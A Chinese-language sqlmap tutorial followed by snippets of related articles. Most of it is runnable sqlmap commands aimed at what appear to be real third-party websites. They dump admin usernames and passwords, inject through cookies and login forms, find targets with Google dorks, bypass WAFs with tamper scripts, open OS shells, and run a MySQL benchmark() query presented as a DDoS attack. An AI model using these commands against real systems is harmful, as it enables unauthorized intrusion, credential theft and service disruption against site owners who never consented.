SQLMAP注入教程

/**
 *    Author :xiaomiao
 *
 *    专注于互联网安全,网站开发
 *
 *    如有问题,可以在新浪@苗_创
 *
**/
1.SQLMAP用于Access数据库注入

(1)猜解是否能注入
win:  python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"
Linux : ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"

(2)猜解表
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --tables
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"  --tables

(3)根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --columns -T admin
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"  --columns -T admin

(4)根据字段猜解内容(假如通过3得到字段为username和password)
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"  --dump -T admin -C
"username,password"

2.SQLMAP用于Cookie注入

(1)cookie注入,猜解表
win : python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2

(2)猜解字段,(通过1的表猜解字段,假如表为admin)
win :python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --columns -T
admin --level 2

(3)猜解内容
win :python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --dump -T
admin -C "username,password" --level 2

3.SQLMAP用于mysql中DDOS攻击
(1)获取一个Shell
win:
python sqlmap.py -u http://192.168.159.1/news.php?id=1 --sql-shell
Linux:
sqlmap -u http://192.168.159.1/news.php?id=1 --sql-shell

(2)输入执行语句完成DDOS攻击
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

4.SQLMAP用于mysql注入
(1)查找数据库
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" --dbs

(2)通过第一步的数据库查找表(假如数据库名为dataname)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname --tables

(3)通过2中的表得出列名(假如表为table_name)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname -T table_name --columns

(4)获取字段的值(假如扫描出id,user,password字段)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname -T table_name -C
"id,user,password" --dump

5.SQLMAP中post登陆框注入

(1)其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件
        我们在使用Sqlmap进行post型注入时,
        经常会出现请求遗漏导致注入失败的情况。
        这里分享一个小技巧,即结合burpsuite来使用sqlmap,
        用这种方法进行post注入测试会更准确,操作起来也非常容易。        
        1. 浏览器打开目标地址http:// www.2cto.com /Login.asp
        2. 配置burp代理(127.0.0.1:8080)以拦截请求
        3. 点击login表单的submit按钮
        4. 如下图,这时候Burp会拦截到了我们的登录POST请求
        5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
        6. 运行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
        这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
        而-p 大家应该比较熟悉,指定注入用的参数。
注入点:http://testasp.vulnweb.com/Login.asp
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass

(2)自动的搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms

(3)指定参数搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=321&tfUPass=321"

6.SQLMAP中Google搜索注入
inurl后面的语言是由自己定的
注入过程中如果选y是注入,如果不是选n
sqlmap  -g inurl:php?id=

7.SQLMAP中的请求延迟
参数 --delay --safe-freq

python sqlmap.py --dbs -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --delay 1
python sqlmap.py --dbs -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --safe-freq 3
参数

8.SQLMAP绕过WAF防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs  --batch --tamper "space2morehash.py"
space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py
都是编码方式
space2hash.py   base64encode.py charencode.py

9.SQLMAP查看权限
sqlmap -u http://192.168.159.1/news.php?id=1 --privileges

10.SQLMAP伪静态注入
(1)查找数据库
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --dbs

(2)通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname --tables

(3)通过2中的数据表得到字段(假如得到的是tablename表)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename --columns

(4)通过3得到字段值(假如从3中得到字段id,password)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename -C "password" --dump

11.SQLMAP注入点执行命令与交互写shell
(1)
注入点:http://192.168.159.1/news.php?id=1

此处采用的是Linux系统
sqlmap -u http://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
出现语言的选择根据实际的测试网站选择语言

指定目标站点D:/www/

(2)获取Shell
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
出现语言的选择根据实际的测试网站选择语言

指定目标站点D:/www/

输入ipconfig
创建用户和删除用户
只要权限足够大

SQLMAP注入教程

时间: 2024-10-08 19:35:20

SQLMAP注入教程的相关文章

使用sqlmap注入DVWA的SQL Injection菜单

1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息. 得到的cookie信息如下: security=low; path=/dvwa/; domain=192.168.0.112 PHPSESSID=0bec860709d15f590768b7713c69b52f; pa

SQLMAP系列教程

1.SQLMAP安装及access注入: http://www.stronkin.com/en/CompHonorBig.asp?id=7 2.Mysql数据库注入 http://www.slibrary.com/link.php?id=321 3.Cookie注入: http://www.ntjx.org/jsj/DownloadShow.asp?id=9 注入语句:sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cook

sqlmap基本教程

-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p "page,id")-D"" #指定数据库名-T"" #指定表名-C"" #指定字段-s"" #保存注入过程到一个文件 ,还可中断下次恢复在注入 (保存-s "xx.log"恢复:-s "xx.log"--resume)--level=(

Sqlmap注入Base64编码的注入点

不小心删了,找快照才找到的.补回来... 上次遇到一个Base64的注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下: sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称” 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:space2ha

sqlmap注入小结

sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断 3.基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中 4.联合查询注入,可以使用union的情况下的注入 5.堆查询

基于dvwa环境下级别为low的SQL手工注入教程

基于dvwa环境下级别为low的SQL手工注入教程: 首先是进入已搭建好的dvwa环境中去(一定要搭建好dvwa环境才能进行下面的操作),这可能会是一些初学者所面临的的第一个问题,比如我,曾为了寻找这个入口,浪费了不少的时间,所以在这里就提一下,最好是能够记住,忘了的话可以随时过来看一下:http://127.0.0.1/DVWA/setup.php. 按照提示点击最下面的按钮创建数据库,创建成功就会直接进入登录页面进行登录,然后就可以直接访问http://127.0.0.1/DVWA/logi

在windows系统和kali中通过sqlmap注入

第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里Python安装我就不一一截图了,因为都是使用默认安装,只是安装的时候根据需要可以修改下安装路径. 在Windows下首先把下载好的sqlmap放在Python路径下 然后我

渗透测试工具sqlmap基础教程

本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过. > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能.然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门. sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 既然本文是基础教程,以下只写工具的基本使用方法. 本教程为sqlmap具体应用案例,如需了解更多sqlmap

SQL 注入教程

SQL 注入测评教程 1     准备 安装包:Burpsuit.Python27.sqlmap 2     安装配置 2.1    Burpsuit 1)       解压Burpsuit 2)       双击运行BurpUnlimited.jar(注:该工具基于java,提前安装好java运行环境) 3)       设置,如图所示 2.2    Python 然后,运行下载的MSI安装包,在选择安装组件的一步时,勾上所有的组件: 特别要注意选上pip和Add python.exe to